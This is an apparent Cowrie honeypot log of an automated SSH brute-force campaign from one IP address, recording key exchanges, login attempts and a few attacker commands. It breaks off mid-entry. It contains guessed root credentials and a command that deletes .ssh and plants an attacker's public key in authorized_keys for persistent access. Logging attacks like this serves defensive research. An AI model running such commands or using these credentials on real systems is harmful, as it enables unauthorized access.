{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57384,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb828dd46454","protocol":"ssh","message":"New connection: 212.227.235.229:57384 (1.2.3.4:22) [session: bb828dd46454]","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.073053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.073841Z","src_ip":"212.227.235.229","session":"bb828dd46454"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60230,"dst_ip":"1.2.3.4","dst_port":22,"session":"5943c693a76d","protocol":"ssh","message":"New connection: 212.227.235.229:60230 (1.2.3.4:22) [session: 5943c693a76d]","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.338559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.339366Z","src_ip":"212.227.235.229","session":"5943c693a76d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.376551Z","src_ip":"212.227.235.229","session":"bb828dd46454"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:50.663179Z","src_ip":"212.227.235.229","session":"5943c693a76d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:10:51.627689Z","src_ip":"212.227.235.229","session":"bb828dd46454"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:51.938598Z","src_ip":"212.227.235.229","session":"bb828dd46454"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:51.939931Z","src_ip":"212.227.235.229","session":"ea513e811b86"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:10:52.000844Z","src_ip":"212.227.235.229","session":"5943c693a76d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:53.327904Z","src_ip":"212.227.235.229","session":"5943c693a76d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33148,"dst_ip":"1.2.3.4","dst_port":22,"session":"31ab5229dd72","protocol":"ssh","message":"New connection: 212.227.235.229:33148 (1.2.3.4:22) [session: 31ab5229dd72]","sensor":"my-vps","timestamp":"2025-09-08T23:10:53.662010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:53.662727Z","src_ip":"212.227.235.229","session":"31ab5229dd72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:53.992553Z","src_ip":"212.227.235.229","session":"31ab5229dd72"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:10:55.353520Z","src_ip":"212.227.235.229","session":"31ab5229dd72"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:55.684798Z","src_ip":"212.227.235.229","session":"31ab5229dd72"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:10:55.689251Z","src_ip":"212.227.235.229","session":"be2c7f2977b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51592,"dst_ip":"1.2.3.4","dst_port":22,"session":"f020d620f8cb","protocol":"ssh","message":"New connection: 212.227.235.229:51592 (1.2.3.4:22) [session: f020d620f8cb]","sensor":"my-vps","timestamp":"2025-09-08T23:10:57.511352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:10:57.518455Z","src_ip":"212.227.235.229","session":"f020d620f8cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:10:57.793309Z","src_ip":"212.227.235.229","session":"f020d620f8cb"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:10:58.776126Z","src_ip":"212.227.235.229","session":"f020d620f8cb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:00.029128Z","src_ip":"212.227.235.229","session":"f020d620f8cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33554,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d2e453fab4","protocol":"ssh","message":"New connection: 212.227.235.229:33554 (1.2.3.4:22) [session: 34d2e453fab4]","sensor":"my-vps","timestamp":"2025-09-08T23:11:04.335227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:04.335858Z","src_ip":"212.227.235.229","session":"34d2e453fab4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32924,"dst_ip":"1.2.3.4","dst_port":22,"session":"34044ba5bc80","protocol":"ssh","message":"New connection: 212.227.235.229:32924 (1.2.3.4:22) [session: 34044ba5bc80]","sensor":"my-vps","timestamp":"2025-09-08T23:11:15.705992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:15.706885Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:16.017666Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:11:17.302375Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:11:17.994579Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:11:17.995359Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:11:17.996670Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:18.309038Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:11:18.987998Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:11:18.988662Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:11:19.301809Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:19.302608Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34246,"dst_ip":"1.2.3.4","dst_port":22,"session":"13677567de46","protocol":"ssh","message":"New connection: 212.227.235.229:34246 (1.2.3.4:22) [session: 13677567de46]","sensor":"my-vps","timestamp":"2025-09-08T23:11:19.611084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:19.611959Z","src_ip":"212.227.235.229","session":"13677567de46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:19.922884Z","src_ip":"212.227.235.229","session":"13677567de46"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:11:21.210214Z","src_ip":"212.227.235.229","session":"13677567de46"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:22.523689Z","src_ip":"212.227.235.229","session":"13677567de46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35540,"dst_ip":"1.2.3.4","dst_port":22,"session":"977815bed70e","protocol":"ssh","message":"New connection: 212.227.235.229:35540 (1.2.3.4:22) [session: 977815bed70e]","sensor":"my-vps","timestamp":"2025-09-08T23:11:22.832284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:22.833290Z","src_ip":"212.227.235.229","session":"977815bed70e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:23.142925Z","src_ip":"212.227.235.229","session":"977815bed70e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:11:24.425886Z","src_ip":"212.227.235.229","session":"977815bed70e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:24.737799Z","src_ip":"212.227.235.229","session":"977815bed70e"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:24.738642Z","src_ip":"212.227.235.229","session":"34044ba5bc80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51950,"dst_ip":"1.2.3.4","dst_port":22,"session":"da2c3974acbf","protocol":"ssh","message":"New connection: 212.227.235.229:51950 (1.2.3.4:22) [session: da2c3974acbf]","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.344183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.345233Z","src_ip":"212.227.235.229","session":"da2c3974acbf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.483155Z","src_ip":"212.227.235.229","session":"da2c3974acbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50714,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ee3fb5281f","protocol":"ssh","message":"New connection: 212.227.235.229:50714 (1.2.3.4:22) [session: 06ee3fb5281f]","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.571794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.574913Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh 